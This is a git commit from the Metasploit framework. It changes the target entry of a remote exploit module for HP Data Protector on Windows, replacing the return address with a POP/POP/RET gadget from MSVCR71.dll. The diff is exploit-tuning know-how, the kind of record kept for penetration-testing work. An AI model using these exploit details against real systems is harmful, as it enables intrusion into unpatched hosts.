Change to a better P/P/R, tested on 4 different machines. Thx fdiskyou.

git-svn-id: file:///home/svn/framework3/trunk@13081 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Wei Chen 2011-07-01 22:26:12 +00:00
parent b6e1c6a967
commit dbd04d754a
1 changed files with 3 additions and 2 deletions

View File

@ -47,9 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'HP Data Protector A.06.10: INET, internal build 611',
[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',
{
'Ret' => 0x0044673a
#POP/POP/RET from OmniBack\bin\MSVCR71.dll
'Ret' => 0x7c35630d
}
],
],